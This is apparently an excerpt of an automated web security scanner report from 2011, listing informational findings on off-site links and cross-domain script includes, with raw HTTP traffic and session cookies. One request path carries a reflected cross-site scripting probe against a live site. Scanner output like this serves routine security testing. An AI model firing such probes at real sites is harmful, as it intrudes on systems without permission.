<a href="http://www.facebook.com/rsarja" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41641_1069590167_8489_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000748617778" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275828_100000748617778_4321253_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ileanamarieortiz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275644_542216672_6216143_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=582763436" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48905_582763436_3184_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/261029_1193179193_1591267711_q.jpg" alt="" /><div class="name">
...[SNIP]...

11.57. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=ciphertext+data+security HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=MmnHHrVyllkn5fUstvfqnPtDp4u0CWWdVJvI2wnRNCbJ0VTX3xRmmWIdcUNum52LGTHmJ4SicY09qkVQjFkDETjGrBCKXQoY7-i_aw4mT0NH1g_cavbeS6OkojcbVt7T

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:41:16 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 108318

<!doctype html> <head> <title>ciphertext data security - Google Search</title> <script>window.google={kEI:"7P1tTsXEJJTUiAKK9tTSCQ",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAtt
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=ciphertext+data+security&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://msdn.microsoft.com/en-us/library/ff650720.aspx" class=l onmousedown="return clk(this,this.href,'','','','1','','0CEIQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Sji6FIwwlxIJ:msdn.microsoft.com/en-us/library/ff650720.aspx+ciphertext+data+security&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CEQQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Cipher" class=l onmousedown="return clk(this,this.href,'','','','2','','0CEkQFjAB')">Cipher - Wikipedia, the free encyclopedia</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:oemRhzQ2UAYJ:en.wikipedia.org/wiki/Cipher+ciphertext+data+security&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CEsQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Ciphertext_stealing" class=l onmousedown="return clk(this,this.href,'','','','3','','0CFAQFjAC')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:fulsrvTK4hIJ:en.wikipedia.org/wiki/Ciphertext_stealing+ciphertext+data+security&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CFIQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.naun.org/journals/communications/c-21.pdf" class=l onmousedown="return clk(this,this.href,'','','','4','','0CFkQFjAD')"><em>
...[SNIP]...
<h3 class="r"><a href="http://searchsecurity.techtarget.com/definition/ciphertext-feedback" class=l onmousedown="return clk(this,this.href,'','','','5','','0CGIQFjAE')">What is <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:zQXddN3z37oJ:searchsecurity.techtarget.com/definition/ciphertext-feedback+ciphertext+data+security&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CGQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://publib.boulder.ibm.com/infocenter/dsichelp/ds8000ic/topic/com.ibm.storage.ssic.help.doc/f2c_encryption_concepts_3ekm4r.html" class=l onmousedown="return clk(this,this.href,'','','','6','','0CGgQFjAF')">Encryption concepts</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:_ppv8Eu5Z0EJ:publib.boulder.ibm.com/infocenter/dsichelp/ds8000ic/topic/com.ibm.storage.ssic.help.doc/f2c_encryption_concepts_3ekm4r.html+ciphertext+data+security&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CGoQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.webopedia.com/TERM/C/cipher_text.html" class=l onmousedown="return clk(this,this.href,'','','','7','','0CG8QFjAG')">What is <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Aspm2TbMkFIJ:www.webopedia.com/TERM/C/cipher_text.html+ciphertext+data+security&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CHEQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber=4784733" class=l onmousedown="return clk(this,this.href,'','','','8','','0CHYQFjAH')">Self-Encryption Scheme for <em>
...[SNIP]...
<h3 class="r"><a href="http://www.omnisecu.com/security/public-key-infrastructure/what-is-symmetric-encryption.htm" class=l onmousedown="return clk(this,this.href,'','','','9','','0CIEBEBYwCA')">What is Symmetric Encryption?</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:j9o4Xdm5kfYJ:www.omnisecu.com/security/public-key-infrastructure/what-is-symmetric-encryption.htm+ciphertext+data+security&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CIYBECAwCA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cs.umd.edu/~jkatz/papers/cca-multiple.ps" class=l onmousedown="return clk(this,this.href,'','','','10','','0CIoBEBYwCQ')">Chosen-<em>
...[SNIP]...
</span> Adobe PostScript - <a href="http://webcache.googleusercontent.com/search?q=cache:0ggui1rkxhwJ:www.cs.umd.edu/~jkatz/papers/cca-multiple.ps+ciphertext+data+security&cd=10&hl=en&ct=clnk&gl=us" class=fl onmousedown="return clk(this,this.href,'','','','10','','0CI8BECEwCQ')">View as HTML</a>
...[SNIP]...

11.58. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=1&ved=0CEQQFjAA&url=http%3A%2F%2Fwww.ciphertex.com%2F&ei=8v1tTt-yHsfZiAKlyvW-Dg&usg=AFQjCNFy8eMoe0HZpui9iurbD13vX4OCsg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ciphertext+data+security#hl=en&sa=X&ei=7P1tTsXEJJTUiAKK9tTSCQ&ved=0CD4QBSgA&q=ciphertex+data+security&spell=1&bav=on.2,or.r_gc.r_pw.&fp=ad22561d38e22c32&biw=1155&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=51=Lh__unmUq20T1IIqPNby3lnxFSUZGdvQ5_BieXTCVwXmSNjk57-to0QCiQto54PtZva07UOavPS_hgWY0dmvp105NE76_GwJkql9ucFgdgF_oJRWulkjljosco7JuoGh

Response

HTTP/1.1 302 Found
Location: http://www.ciphertex.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 12 Sep 2011 12:41:32 GMT
Server: gws
Content-Length: 222
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.ciphertex.com/">here</A>
...[SNIP]...

11.59. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web014-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832630%7C5CKyG59MaJD7bSL%2BWHYWGqeAyMWC71WkfTqG%2FgrlKsXzqjYH8JcN%2BVHCKe1sQLdwNRmlR66qd%2BN6nGNdxVd%2BTEYtwVmgVvDNddwciSAOcL%2FsjPvmppJcUaHyoyNVEQt4%2F2BBcC6BoZQb9K%2F6t979ZN1XHdoJkpX2z8GxZjTEJ6rnzryCKtBnna0nrKS08GlTS6M0J3weSHeuZzKDMs35tw%3D%3D%7C1a48544dabced6305ba059d446818611fec5a1dc; expires=Wed, 05-Oct-2011 16:37:10 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:03:50 GMT
Server: lighttpd/1.4.26
Content-Length: 7845

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-36POJYHTosuxU" target="_blank"><img src="//secure.quantserve.com/pixel/p-36POJYHTosuxU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script><noscript><div class="statcounter"><img class="statcounter" src="http://c.statcounter.com/3927460/0/d7055de4/1/" alt="" /></div>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

12. Cross-domain script include
There are 28 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


12.1. http://67.23.1.124/omni/cdcc_mandelbrot_min_2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://67.23.1.124
Path:   /omni/cdcc_mandelbrot_min_2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /omni/cdcc_mandelbrot_min_2.html HTTP/1.1
Host: 67.23.1.124
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:46:36 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Wed, 29 Jun 2011 17:40:08 GMT
ETag: "500dcb-1d0-4a6dd4685ce00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 464
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mandelbrot Cross-Dom
...[SNIP]...
<body>
<script src="//cdn.link-smart.com/linksmart_receiver_2.0.0.min.js" type="text/javascript">
</script>
...[SNIP]...

12.2. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;pos=3;tile=3;sz=300x250;ord=4942? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 4212
Date: Mon, 12 Sep 2011 12:48:16 GMT

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110719/abg.js"></script>
...[SNIP]...

12.3. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/cdg.NowPublic.Home

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/cdg.NowPublic.Home;kw=;ptype=home;dcopt=ist;tile=1;sz=728x90;ord=6895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html; charset=UTF-8
Content-Length: 4207
Date: Mon, 12 Sep 2011 12:48:15 GMT

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...

12.4. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0201.rm.sp2
Set-Cookie: ih="b!!!!#!3e]N!!!!#=4X%/"; path=/; expires=Wed, 11-Sep-2013 12:48:37 GMT
Set-Cookie: vuday1=Ve/>3!4j#()xxac; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Set-Cookie: uid=uid=88b682c8-dd3d-11e0-8111-78e7d162bf12&_hmacv=1&_salt=2987826240&_keyid=k1&_hmac=d6fc6e23e1a639a39e50969336a0089f0e9aba40; path=/; expires=Wed, 12-Oct-2011 12:48:37 GMT
Set-Cookie: liday1=:Op`R$4^M4!4j#(@7q_<; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:37 GMT
Pragma: no-cache
Content-Length: 712
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10293202
...[SNIP]...
</script><script language='javascript' type='text/javascript' src='http://imp.fetchback.com/serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyGU7cAGuPgwIBKUxdsQ9Q3BWxA1EZ3x6w0qfIB96GlPW2ywlNI0NZFhE4MiywKGDSB5unV2lqUhxhgGAMekDiJaeYtd7gINuD%2E3CeIfiEcy3H8lb25tJ3bNnjd62dHvf963hQDLsM7%2EBYxmzTT0uPrqnHTuSxm6TcL9vBgnMRZBiKJkVgiYVkIOTsJDRASLMpKZuZZ5IeTquS5jGLdD3te0Q1Vde7qulOqeL%2Dp635yOWTe7lPobpv5WYg%3D%3D%2C'></script>
...[SNIP]...

12.5. http://advertising.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: advertising.yahoo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: B=8d7n6ot73ufk2&b=3&s=qd

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:00:28 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 36631

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<link rel="stylesheet" type="text/css" href="http://l.yimg.com/d/lib/b2b/d/static/b2b/1.7.2/base-static.css" />
<link rel="stylesh
...[SNIP]...
</script>

<script type="text/JavaScript" src="http://yui.yahooapis.com/combo?2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&2.8.1/build/event-mouseenter/event-mouseenter-min.js&2.8.1/build/get/get-min.js&2.8.1/build/container/container-min.js&2.8.1/build/element/element-min.js&2.8.1/build/animation/animation-min.js&2.8.1/build/button/button-min.js&2.8.1/build/connection/connection-min.js&2.8.1/build/carousel/carousel-min.js&2.8.1/build/paginator/paginator-min.js&2.8.1/build/menu/menu-min.js&2.8.1/build/utilities/utilities.js&2.8.1/build/json/json-min.js&2.8.1/build/tabview/tabview-min.js&2.8.1/build/calendar/calendar-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/get/get-min.js&2.8.1/build/history/history-min.js"></script>
<script type="text/JavaScript" src="http://us.js.yimg.com/lib/rapid/rapid_1.9.0.js"></script>
<script type="text/JavaScript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/JavaScript" src="http://l.yimg.com/a/lib/b2b/d/js/swfobject.js"></script>
<script type="text/JavaScript" src="http://a.l.yimg.com/a/lib/s6/miniassist_201005241451.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_videoplayerimages.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_href.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_instrumentation.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_universalheader.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_mainmenu.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_switcher.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_switcher_home.js"></script>
<script type="text/javascript" src="http://l.yimg.com/d/lib/b2b/d/js/1.7.2/b2b_listing_carouselads.js"></script>
...[SNIP]...

12.6. http://drupalsn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drupalsn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: drupalsn.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.10
Last-Modified: Mon, 12 Sep 2011 11:13:13 GMT
ETag: "15370f717238f8b958e388e85f24d38b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 55122
Date: Mon, 12 Sep 2011 12:50:04 GMT
X-Varnish: 607623703
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head> <titl
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</div><script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

12.7. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-3717378713686065&output=html&h=60&slotname=2121162070&w=468&lmt=1315849707&flash=10.3.183&url=http%3A%2F%2Fmydirtbike.com%2F&dt=1315849730940&bpp=207&shv=r20110831&jsv=r20110719&prev_slotnames=8977042794&correlator=1315849731256&frm=4&adk=1914620364&ga_vid=879222618.1315849731&ga_sid=1315849731&ga_hid=1703698942&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=droid%20sans&dfs=12&adx=576&ady=1925&biw=1139&bih=870&eid=36887102&ref=http%3A%2F%2Fdrupal.org%2Fcases&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=442&xpc=5FpE3kRdNR&p=http%3A//mydirtbike.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
